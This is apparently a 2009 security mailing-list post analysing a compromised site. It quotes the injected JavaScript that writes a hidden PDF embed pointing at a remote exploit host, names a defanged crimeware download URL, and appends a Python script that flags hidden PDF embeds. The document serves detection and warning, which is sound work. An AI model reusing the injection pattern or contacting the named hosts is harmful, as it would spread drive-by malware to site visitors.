-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securin...@gmail.com> wrote:

>> I took a quick look at the code... formatted it in a pastebin here:
>> http://pastebin.com/m7b50be54
>>
>> That javascript writes this to the page (URL obscured):
>> document.write("<embed
>> src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\"
>> type=\"application/pdf\"></embed>");
>>
>> The 1.2.3.4 in the URL is my public IP address (I changed that).
>>
>> Below the javascript, it grabs a PDF:
>> <embed src="include/two.pdf" width="1" height="0"
>> style="border:none"></embed>
>>
>> That PDF is on the site, I haven't looked at it yet though.
>>

Not only is that .pdf malicious, when "executed" it also fetches additional malware from:

hxxp:// test1.ru /1.1.1/load.php

If that host is not in your block list, it should be -- known purveyor of crimeware.

This is in addition to the other malicious URLs mentioned in this thread.

- - ferg

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.5.3 (Build 5003)

wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI
mxM8Ci/feKnJe6M6qbiESPw=
=b0Yj
-----END PGP SIGNATURE-----

--
"Fergie", a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawgster(at)gmail.com
 ferg's tech blog: http://fergdawg.blogspot.com/
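The pattern Chris quotes above (a JavaScript `document.write` that emits a 0x0 `<embed type="application/pdf">` whose URL carries a `stat=` tuple ending in the visitor's IP, plus a static 1x0 PDF embed) is something a responder wants to pull out of a captured page mechanically rather than by eye. The script below is an added triage example written for this page, not code posted in the thread or taken from the pastebin. The sample page is constructed to mirror the quoted markup (the defanged `hXXp://` URL is kept as quoted), and the helper names are my own.

```python
import re
from html import unescape
from urllib.parse import urlsplit, parse_qs

# Constructed sample page modelled on the markup quoted in the thread
# (defanged hXXp:// kept as quoted); this is not the pastebin content.
SAMPLE_PAGE = r'''
<html><body>
<script>
document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");
</script>
<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
<embed src="brochure.pdf" width="600" height="400" type="application/pdf"></embed>
</body></html>
'''

# document.write("...") with a double-quoted JS string literal
# (single-quoted literals and string concatenation are not handled here).
DOCWRITE_RE = re.compile(r'document\.write\(\s*"((?:\\.|[^"\\])*)"\s*\)', re.S)
SCRIPT_RE = re.compile(r'<script\b.*?</script>', re.S | re.I)
EMBED_RE = re.compile(r'<embed\b([^>]*)>', re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')
IPV4_RE = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3}$')


def _unescape_js(s):
    """Undo simple JS backslash escapes (backslash-quote etc.) in the written string."""
    return re.sub(r'\\(.)', r'\1', s)


def markup_chunks(page):
    """Static markup (scripts removed) first, then markup emitted by document.write."""
    chunks = [(SCRIPT_RE.sub('', page), False)]
    for m in DOCWRITE_RE.finditer(page):
        chunks.append((_unescape_js(m.group(1)), True))
    return chunks


def find_embeds(page):
    """All <embed> tags on the page, including ones only present after document.write."""
    embeds = []
    for chunk, via_docwrite in markup_chunks(page):
        for m in EMBED_RE.finditer(chunk):
            attrs = {k.lower(): unescape(v) for k, v in ATTR_RE.findall(m.group(1))}
            attrs['via_docwrite'] = via_docwrite
            embeds.append(attrs)
    return embeds


def _px(value):
    try:
        return int(value)
    except (TypeError, ValueError):
        return None


def stat_fields(src):
    """Split the 'stat' query parameter on '|' (the GeoIP/client-IP tuple quoted above)."""
    qs = parse_qs(urlsplit(src).query)
    return qs['stat'][0].split('|') if 'stat' in qs else []


def triage(page):
    """Findings for hidden (0 or 1 px) PDF embeds, the pattern quoted in the thread."""
    findings = []
    for e in find_embeds(page):
        src = e.get('src', '')
        w, h = _px(e.get('width')), _px(e.get('height'))
        hidden = (w is not None and w <= 1) or (h is not None and h <= 1)
        is_pdf = (e.get('type', '').lower() == 'application/pdf'
                  or urlsplit(src).path.lower().endswith('.pdf'))
        if hidden and is_pdf:
            fields = stat_fields(src)
            findings.append({
                'src': src,
                'via_docwrite': e['via_docwrite'],
                'stat': fields,
                # last '|' field looking like an IPv4 address: the page tags the visitor
                'tracks_client_ip': bool(fields) and bool(IPV4_RE.match(fields[-1])),
            })
    return findings


if __name__ == '__main__':
    for finding in triage(SAMPLE_PAGE):
        print(finding)
```

Run against a saved copy of the landing page, it reports both hidden PDF embeds and leaves the visible 600x400 one alone; the `via_docwrite` flag tells you which URL only exists after the script runs, which is the one a static crawler would miss, and `tracks_client_ip` flags the per-visitor tagging Chris noticed in the `stat=` parameter.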